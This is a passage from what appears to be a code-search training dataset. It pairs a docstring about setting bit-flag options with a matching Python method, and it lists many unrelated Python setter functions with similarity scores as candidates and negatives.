"def set(self):\n\n raise Exception(\"Can't set frmt.\")",
"def set_register(self, name, value):\n if name is 'P':\n value = value | (1 << 5)\n\n self.regs[name].set_value(value & 0xFF)\n return value & 0xFF",
"def test_bit_set_bit_invalid_arg_type(self):\n value = 85323.9\n ops = [bitwise_operations.bit_set(self.test_bin_zeroes, 0, 8, 1, value, None)]\n with pytest.raises(e.ParamError):\n self.as_connection.operate(self.test_key, ops)",
"def _setValveCharacteristic(self, f):\n if type(f) == types.InstanceType:\n self.setFunction(f)\n else:\n raise CanteraError(\"Wrong type for valve characteristic function.\")",
"def set_state( self ):",
"def value(self, value):\n\n\t\tself.__value = value",
"def set(self, boolean):\n self._val = boolean",
"def setExceptions(self, value):\n return self._set(exceptions=value)",
"def set_value(self, value):\n self.value = value\n return self",
"def _set_value(self, value):\n if value is undefined:\n self._status = 3 if (self._count == 0) else 0\n return # new tick, but no update of value\n self._last_value = self._value\n self._value = value\n self._count += 1\n self._last_timestamp = self._timestamp\n self._timestamp = time.time()\n self._status = 0\n if self._ob is not None:\n ob = self._ob()\n if hasattr(ob, '_signal_changed'):\n ob._signal_changed(self)",
"def __init__(self, value: str):\n self.options = [\n \"eddy_diffusion\",\n \"well_mixed\"\n ]",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def set_state(self, value):\n self.state = value",
"def setatt(self, value):\n if (value*4) % 1 :\n print ('RDCAT : WARNING {0} is not a multiple of 0.25 dB'.format(value))\n r=requests.get(self.url+'SETATT={0}\\n'.format(value))\n if r.text!='1':\n raise Exception('RDCAT : Error while setting attenuation.')",
"def set_dword(ea, value):\n if not ida_bytes.patch_dword(ea, value):\n raise RuntimeError(\"Unable to set value {} at {}\".format(ea, value))",
"def change_value_api(self, exe_name):\n exe = os.path.join(os.getcwd(), exe_name)\n\n # Create a target by the debugger.\n target = self.dbg.CreateTarget(exe)\n self.assertTrue(target, VALID_TARGET)\n\n # Create the breakpoint inside function 'main'.\n breakpoint = target.BreakpointCreateByLocation('main.c', self.line)\n self.assertTrue(breakpoint, VALID_BREAKPOINT)\n\n # Create the breakpoint inside the function 'main'\n check_breakpoint = target.BreakpointCreateByLocation('main.c', self.check_line)\n self.assertTrue(check_breakpoint, VALID_BREAKPOINT)\n\n # Create the breakpoint inside function 'main'.\n end_breakpoint = target.BreakpointCreateByLocation('main.c', self.end_line)\n self.assertTrue(end_breakpoint, VALID_BREAKPOINT)\n\n # Now launch the process, and do not stop at entry point.\n process = target.LaunchSimple(None, None, os.getcwd())\n self.assertTrue(process, PROCESS_IS_VALID)\n\n # Get Frame #0.\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread.IsValid(), \"There should be a thread stopped due to breakpoint condition\")\n frame0 = thread.GetFrameAtIndex(0)\n self.assertTrue (frame0.IsValid(), \"Got a valid frame.\")\n\n # Get the val variable and change it:\n error = lldb.SBError()\n\n val_value = frame0.FindVariable (\"val\")\n self.assertTrue (val_value.IsValid(), \"Got the SBValue for val\")\n actual_value = val_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a value from val\")\n self.assertTrue (actual_value == 100, \"Got the right value from val\")\n \n result = val_value.SetValueFromCString (\"12345\")\n self.assertTrue (result, \"Setting val returned True.\")\n actual_value = val_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a changed value from val\")\n self.assertTrue (actual_value == 12345, \"Got the right changed value from val\")\n \n # Now check that we can set a structure element:\n\n mine_value = frame0.FindVariable (\"mine\")\n self.assertTrue (mine_value.IsValid(), \"Got the SBValue for mine\")\n \n mine_second_value = mine_value.GetChildMemberWithName (\"second_val\")\n self.assertTrue (mine_second_value.IsValid(), \"Got second_val from mine\")\n actual_value = mine_second_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got an unsigned value for second_val\")\n self.assertTrue (actual_value == 5555)\n\n result = mine_second_value.SetValueFromCString (\"98765\")\n self.assertTrue (result, \"Success setting mine.second_value.\")\n actual_value = mine_second_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a changed value from mine.second_val\")\n self.assertTrue (actual_value == 98765, \"Got the right changed value from mine.second_val\")\n \n # Next do the same thing with the pointer version.\n ptr_value = frame0.FindVariable (\"ptr\")\n self.assertTrue (ptr_value.IsValid(), \"Got the SBValue for ptr\")\n \n ptr_second_value = ptr_value.GetChildMemberWithName (\"second_val\")\n self.assertTrue (ptr_second_value.IsValid(), \"Got second_val from ptr\")\n actual_value = ptr_second_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got an unsigned value for ptr->second_val\")\n self.assertTrue (actual_value == 6666)\n\n result = ptr_second_value.SetValueFromCString (\"98765\")\n self.assertTrue (result, \"Success setting ptr->second_value.\")\n actual_value = ptr_second_value.GetValueAsSigned (error, 0);\n self.assertTrue (error.Success(), \"Got a changed value from ptr->second_val\")\n self.assertTrue (actual_value == 98765, \"Got the right changed value from ptr->second_val\")\n \n # gcc may set multiple locations for breakpoint\n breakpoint.SetEnabled(False)\n\n # Now continue, grab the stdout and make sure we changed the real values as well...\n process.Continue();\n\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread.IsValid(), \"There should be a thread stopped due to breakpoint condition\")\n\n expected_value = \"Val - 12345 Mine - 55, 98765, 55555555. Ptr - 66, 98765, 66666666\"\n stdout = process.GetSTDOUT(1000)\n self.assertTrue (expected_value in stdout, \"STDOUT showed changed values.\")\n\n # Finally, change the stack pointer to 0, and we should not make it to our end breakpoint.\n frame0 = thread.GetFrameAtIndex(0)\n self.assertTrue (frame0.IsValid(), \"Second time: got a valid frame.\")\n sp_value = frame0.FindValue (\"sp\", lldb.eValueTypeRegister);\n self.assertTrue (sp_value.IsValid(), \"Got a stack pointer value\")\n result = sp_value.SetValueFromCString(\"1\")\n self.assertTrue (result, \"Setting sp returned true.\")\n actual_value = sp_value.GetValueAsUnsigned (error, 0)\n self.assertTrue (error.Success(), \"Got a changed value for sp\")\n self.assertTrue (actual_value == 1, \"Got the right changed value for sp.\")\n \n # Boundary condition test the SBValue.CreateValueFromExpression() API.\n # LLDB should not crash!\n nosuchval = mine_value.CreateValueFromExpression(None, None)\n\n process.Continue()\n\n self.assertTrue(process.GetState() == lldb.eStateStopped)\n thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonBreakpoint)\n self.assertTrue(thread == None, \"We should not have managed to hit our second breakpoint with sp == 1\")\n \n process.Kill()",
"def set_error(self, name, value):\n self.errors[name] = value",
"def set_val(self, input):\n return",
"def setConstantValue(self, constant_value):\r\n\t\tself.ConstantValue = ConstantValue",
"def _set_power(self, value: str):\n if value == STATE_ON:\n self.state[1] = self.state[1][:2] + '1' + self.state[1][3:]\n\n if value == STATE_OFF:\n self.state[1] = self.state[1][:2] + '0' + self.state[1][3:]",
"def set_bomb(self):\n self.bomba = True",
"def setValue(self, value):\n self.setValues((value, value))",
"def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)"
] | [
"0.6006613",
"0.59550226",
"0.5876505",
"0.5848868",
"0.58279836",
"0.57625586",
"0.57241833",
"0.57025355",
"0.5644544",
"0.56344664",
"0.5631761",
"0.55913144",
"0.55671185",
"0.551112",
"0.5497896",
"0.5429743",
"0.54183626",
"0.53717023",
"0.5368946",
"0.53565514",
"0.5347902",
"0.53451985",
"0.5303583",
"0.529641",
"0.5279937",
"0.52314514",
"0.5228706",
"0.52227205",
"0.5221943",
"0.52100074",
"0.52006066",
"0.51646626",
"0.51585066",
"0.5135795",
"0.50984234",
"0.5097249",
"0.50876653",
"0.5077763",
"0.50727683",
"0.50532305",
"0.50528306",
"0.50527555",
"0.505041",
"0.504531",
"0.5045042",
"0.50133383",
"0.50133383",
"0.5010557",
"0.5010001",
"0.49986178",
"0.49870855",
"0.49844593",
"0.49844593",
"0.49844593",
"0.49809316",
"0.4980904",
"0.4961235",
"0.49609217",
"0.49458975",
"0.49400958",
"0.49400562",
"0.49398074",
"0.49378914",
"0.4934352",
"0.49112028",
"0.49104732",
"0.49007127",
"0.48794076",
"0.48685896",
"0.486616",
"0.48644373",
"0.48632887",
"0.48574615",
"0.48507324",
"0.48439005",
"0.48430458",
"0.4828401",
"0.48257303",
"0.48239243",
"0.48178342",
"0.48077777",
"0.48076195",
"0.48050842",
"0.48030123",
"0.4802926",
"0.48020336",
"0.47954947",
"0.4793415",
"0.47924808",
"0.47867045",
"0.47861558",
"0.47854972",
"0.47847798",
"0.47819123",
"0.47814485",
"0.47792783",
"0.47766557",
"0.47738823",
"0.47733542",
"0.4770173"
] | 0.7903865 | 0 |
Set the value. (And calls the base class) This will also check for Options to set the bools. BOOLEAN_CONFIG_1 >>> BIT_PROBE_TERMINATION = 0 >>> BIT_TMODE = 1 >>> BIT_EMODE = 2 >>> BIT_MUTE = 3 >>> BIT_PATTERN_TRIGGER = 4 >>> BIT_DEBUG_REALTIME = 5 >>> BIT_DEBUGPRINT = 6 >>> BIT_DEBUG_HW_OVERRIDE = 7 | def set_value(self, item, value):
super(t_8_Bit_Options, self).set_value(item, value)
if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):
self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def Set(self,value):\n if value:\n onoff = 0x01\n else:\n onoff = 0x00\n self.Bus.Write_uInt8(self.Address,0x20+self.Pin, onoff)",
"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def set_bools(self, value, bools, limit):\n for x in range(limit):\n if value & 1 << x:\n bools[x]['value'] = True\n else:\n bools[x]['value'] = False\n pass",
"def change_setting(self, key, val):\n if isinstance(val, bool):\n payload = 'on' if val else 'off'\n else:\n payload = val\n return self._request('post',\n 'fifo_command.php?cmd={}%20{}'.format(key,\n payload))",
"def set_value(self, item, value):\n super(t_16_Bit_Options, self).set_value(item, value)\n\n if(item == t_16_Bit_Options.FAULT_ACTIVE):\n self.set_bools(value, self.faults_current, t_16_Bit_Options.BIT_FAULT_MAX )\n\n if(item == t_16_Bit_Options.FAULT_LATCHED):\n self.set_bools(value, self.faults_latched, t_16_Bit_Options.BIT_FAULT_MAX )",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def set(self, boolean):\n self._val = boolean",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def set_bit(self, instance, value):\n print(f\"Server: {'set_bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_server(value)\n else:\n print('device is None')",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def set_flag(self, flag_name, value):\n flags = {'C':0, # Carry\n 'Z':1, # Zero\n 'I':2, # Interrupt mask\n 'D':3, # Decimal\n 'B':4, # Break\n 'V':6, # Overflow\n 'N':7} # Negative\n\n flag_reg = self.get_register('P')\n if value == 1:\n new_flag = flag_reg | 1 << flags[flag_name]\n else:\n new_flag = flag_reg & ~(1 << flags[flag_name])\n\n self.set_register('P', new_flag)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def Set(self,value):\n self.Bus.Write_uInt8(self.Address,0x50+self.Pin,value)",
"def setFlag(self, flag, value) -> None:\n ...",
"def set_config_value(self, value, index=None):",
"def write(writer: BitStreamWriter, value: bool) -> None:\n\n writer.writeBool(value)",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def set_value(self, setting_id, value):\n if setting_id not in self.values:\n raise KeyError\n\n if self.types[setting_id] == \"bool\":\n self.values[setting_id] = (value.lower() == 'true')\n else:\n self.defaults[setting_id] = value\n return",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def setValue(self,val):\n if val:\n self.input.setCheckState(QtCore.Qt.Checked)\n else:\n self.input.setCheckState(QtCore.Qt.Unchecked)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def SetAlwaysShowWiredInterface(self, value):\n config = ConfigParser.ConfigParser()\n config.read(self.app_conf)\n config.set(\"Settings\", \"always_show_wired_interface\", \n misc.to_bool(value))\n config.write(open(self.app_conf, \"w\"))\n self.always_show_wired_interface = misc.to_bool(value)",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"async def bit(self, instance, value):\n print(f\"Server: {'bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_client(value)\n else:\n print('device is None')",
"def set_switch_config(self, config_flags, miss_send_len):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n self.logger.info(\"Setting config on switch \"\n \"dpid=%s to config_flags flag=%s and \"\n \"miss_send_len=%s bytes\",\n self.dpid, config_flags, miss_send_len)\n try:\n self.datapath.send_msg(parser.OFPSetConfig(\n self.datapath,\n config_flags,\n miss_send_len))\n except:\n #*** Log the error and return 0:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to set switch config. \"\n \"Exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return 0\n return 1",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def rc_set_toggle(self,rc_field,value=None):\n\n rc_val = getattr(self.rc,rc_field)\n if value is None:\n value = not rc_val\n setattr(self.rc,rc_field,value)",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
"def set(self, value):\n # We can't store the values in the given format, we need to convert\n # them in string first. We also need to validate the value type.\n\n parser_map = {\n 'integer': int,\n 'numeric': float,\n 'date': dateutil_parser.parse,\n 'datetime': dateutil_parser.parse,\n 'keyboardshortcut': json.dumps\n }\n\n error_map = {\n 'keyboardshortcut': 'keyboard shortcut'\n }\n\n try:\n if self._type in ('boolean', 'switch', 'node'):\n assert isinstance(value, bool)\n elif self._type == 'options':\n has_value = next((True for opt in self.options\n if 'value' in opt and opt['value'] == value),\n False)\n assert (has_value or (self.select2 and self.select2['tags']))\n elif self._type == 'date':\n value = parser_map[self._type](value).date()\n else:\n value = parser_map.get(self._type, lambda v: v)(value)\n if self._type == 'integer':\n value = self.normalize_range(value)\n assert isinstance(value, int)\n if self._type == 'numeric':\n value = self.normalize_range(value)\n assert (\n isinstance(value, int) or isinstance(value, float) or\n isinstance(value, decimal.Decimal))\n except Exception as e:\n current_app.logger.exception(e)\n return False, gettext(\n \"Invalid value for {0} option.\".format(\n error_map.get(self._type, self._type)))\n\n pref = UserPrefTable.query.filter_by(\n pid=self.pid\n ).filter_by(uid=current_user.id).first()\n\n value = \"{}\".format(value)\n if pref is None:\n pref = UserPrefTable(\n uid=current_user.id, pid=self.pid, value=value\n )\n db.session.add(pref)\n else:\n pref.value = value\n db.session.commit()\n\n return True, None",
"def pythonvalue(self, value):\n return value in (\"true\", \"1\")",
"def _set_guc_onoff(self, name, value):\n if isinstance(value, six.string_types) and \\\n value.lower() in (b'default', 'default'):\n value = 'default'\n else:\n value = 'on' if value else 'off'\n self._set_guc(name, value)",
"def setenumerated(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetEnumerated(self.AT_H, command, value)",
"def light(self, value: bool | int, /) -> None:",
"def _registerBoolPropertyInPEM27(name, is_visible, defval):\n import uSysDB\n con = uSysDB.connect()\n cur = con.cursor()\n cur.execute(\n \"INSERT INTO confman_parameters (name, type, is_visible, user_id) VALUES (%s, %s, %s, %s)\",\n (name, 0, int(is_visible), 1))\n prop_id = uSysDB.get_last_inserted_value(con, \"confman_parameters\")\n cur.execute(\n \"INSERT INTO confman_bool_parameters (parameter_id, value, vlimit) VALUES (%s, %s, %s)\",\n (prop_id, int(defval), -1))",
"def set_value(self, value: ScalarType) -> None:\n if isinstance(value, bool):\n value_str = 'true' if value else 'false'\n else:\n value_str = str(value)\n start_mark = self.yaml_node.start_mark\n end_mark = self.yaml_node.end_mark\n # If we're of a class type, then we want to keep that tag so that the\n # correct Constructor is called. If we're a built-in type, set the tag\n # to the appropriate YAML tag.\n tag = self.yaml_node.tag\n if tag.startswith('tag:yaml.org,2002:'):\n tag = scalar_type_to_tag[type(value)]\n new_node = yaml.ScalarNode(tag, value_str, start_mark, end_mark)\n self.yaml_node = new_node",
"def SetValue(self, *args):\n return _BRepAlgo.BRepAlgo_DataMapNodeOfDataMapOfShapeBoolean_SetValue(self, *args)",
"def setValue(self,val):\n if self.isCheckable():\n self.setChecked(val)",
"def test_getboolean(self):\n self.assertEqual(self.config.getboolean('advanced','bool'),True)",
"def __init__(self, boolean_name, boolean_value):\n self._boolean_name = process_for_latex(boolean_name)\n self._boolean_value = boolean_value",
"def set_enabled(self, newval):\n rest_val = \"1\" if newval > 0 else \"0\"\n return self._setAttr(\"enabled\", rest_val)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def setValue(self,val):\n if val:\n self.input.setValue(val)",
"def __init__(self, val: bool) -> None:\n if type(val) != bool:\n raise TypeError(f\"Invalid literal {val} with type '{val.__class__.__name__}' for parameter 'val'\")\n self._val: bool = val\n return",
"def new_value(self, value):\n\n def set_relay_mode(momentary_mode_on, momentary_follow_sense, momentary_on_off):\n \"\"\"Set the values of the underlying properties.\"\"\"\n self._momentary_mode_on_prop.new_value = momentary_mode_on\n self._momentary_follow_sense_prop.new_value = momentary_follow_sense\n self._momentary_on_off_trigger_prop.new_value = momentary_on_off\n\n if value is None:\n set_relay_mode(None, None, None)\n return\n\n relay_mode = RelayMode(int(value))\n if relay_mode == self.value:\n set_relay_mode(None, None, None)\n return\n\n if relay_mode == RelayMode.LATCHING:\n set_relay_mode(False, False, False)\n elif relay_mode == RelayMode.MOMENTARY_A:\n set_relay_mode(True, False, False)\n elif relay_mode == RelayMode.MOMENTARY_B:\n set_relay_mode(True, False, True)\n elif relay_mode == RelayMode.MOMENTARY_C:\n set_relay_mode(True, True, False)",
"def set_config(param, value):\n _config = loadConfig()\n _paramField = rgetattr(_config, param)\n # define types that can be cast from command line input\n primitive = (int, str, bool)\n\n def is_primitiveType(_type):\n return _type in primitive\n\n # cast type\n if type(_paramField) == type(Union) and is_primitiveType(type(_paramField).__args__[0]):\n value = type(_paramField).__args__[0](value)\n elif is_primitiveType(type(_paramField)):\n value = type(_paramField)(value)\n\n try:\n rsetattr(_config, param, value)\n except TypeError as err:\n click.echo(err)\n saveConfig(_config)",
"def cbSetConfig( InfoType, BoardNum, DevNum,\n ConfigItem, ConfigVal ):\n CHK( cbw.cbSetConfig( InfoType, BoardNum, DevNum, ConfigItem, ConfigVal ) )",
"def __int__(self):\n flags = self._analog_input_mode\n flags = set_bit(flags, 2, self._send_on_sensor_alarm)\n flags = set_bit(flags, 3, self._send_on_input_port_change)\n flags = set_bit(flags, 4, self._enable_1_wire_port)\n flags = set_bit(flags, 5, self._enable_all_link_aliasing)\n flags = set_bit(flags, 6, self._send_on_output_port_change)\n flags = set_bit(flags, 7, self._enable_output_timers)\n return flags",
"def testConfigC(self):\n assert type(self.config['debug']) == bool, \"Not parsing string to boolean correctly\"",
"def convert_boolean(cls, param, value):\r\n return True",
"def __init__(self, value, extra=None):\n if not isinstance(value, bool):\n raise TypeError(\n 'Passed value must be a bool. %s found instead.' % type(value))\n\n self._value = value\n self._extra = extra",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set(self, value): # interface for BlueSky plans\n if str(value).lower() not in (\"fly\", \"taxi\", \"return\"):\n msg = \"value should be either Taxi, Fly, or Return.\"\n msg + \" received \" + str(value)\n raise ValueError(msg)\n\n if self.busy.value:\n raise RuntimeError(\"spin is operating\")\n\n status = DeviceStatus(self)\n \n def action():\n \"\"\"the real action of ``set()`` is here\"\"\"\n if str(value).lower() == \"taxi\":\n self.taxi()\n elif str(value).lower() == \"fly\":\n self.pre_fly()\n self.fly()\n self.post_fly()\n elif str(value).lower() == \"return\":\n self.motor.move(self.return_position)\n\n def run_and_wait():\n \"\"\"handle the ``action()`` in a thread\"\"\"\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)\n \n threading.Thread(target=run_and_wait, daemon=True).start()\n return status",
"def on_off_bool(value):\n return value == 'on'",
"def set_fan_mode(self, value):\n return self.parent.controller.set_fan_auto_mode(value)",
"def state(self, value, duration=None):\n if value in ['off', 'OFF', '0']:\n self.off()\n if value in ['on', 'ON', '1']:\n self.on(duration)",
"def BIT(self, value):\n result = self.reg.A & value\n self.reg.N = result >> 7\n self.reg.V = result >> 6 & 1\n self.reg.Z = result == 0",
"def set_bit(self, port, bit):\n hw = self.device.peripherals[port]\n hw.BSRR.wr(1 << (bit & 15))",
"def set_value (self):\n raise NotImplementedError",
"async def greeter_toggle(self, ctx, value: bool):\n await queries.update_setting(ctx, \"greeter_settings\", \"is_enabled\", value)\n if value:\n await util.send_success(ctx, \"Greeter is now **enabled**\")\n else:\n await util.send_success(ctx, \"Greeter is now **disabled**\")",
"def log(self, value):\n\n if isinstance(value, bool) or value is None:\n self.__log = value",
"def set_custom_value(self, value):\n self.logger.info(\"Set custom value : %s\" % value)\n\n try:\n self._answer_payload['custom_value'] = value\n except Exception as e:\n self.logger.error(\"Error on set custom variables : %s\" % e)",
"def cast(self, value: Any) -> Any:\n if value is None:\n return False\n if isinstance(value, bool):\n return value\n strvalue = str(value).lower()\n if strvalue in ['1', 't', 'true']:\n return True\n elif strvalue in ['', '0', 'f', 'false']:\n return False\n raise err.InvalidArgumentError(\"not a Boolean '{}'\".format(value))",
"def update_neutron_advanced_configuration(self, option, value):\n attributes = self.nailgun_client.get_cluster_attributes(\n self.cluster_id)\n nac_subdict = attributes['editable']['neutron_advanced_configuration']\n nac_subdict[option]['value'] = value\n self.nailgun_client.update_cluster_attributes(\n self.cluster_id, attributes)",
"def set_switch(self, value):\n act = SwitchAction(self, value)\n return act.invoke()",
"def set_has_fan(self, value: bool = True):\r\n self._logger.info(log_message_formatter(\r\n \"set\", f\"{self}\", \"has_fan\", value))\r\n self._has_fan = value",
"def eflags_set(self, bit: int, value: bool) -> None:\n if self.eflags_get(bit):\n if not value:\n self.eflags &= ~(1 << bit)\n else:\n if value:\n self.eflags |= 1 << bit",
"def write_bool(self, b: bool) -> None:\n self.buffer += struct.pack(\"<?\", b)",
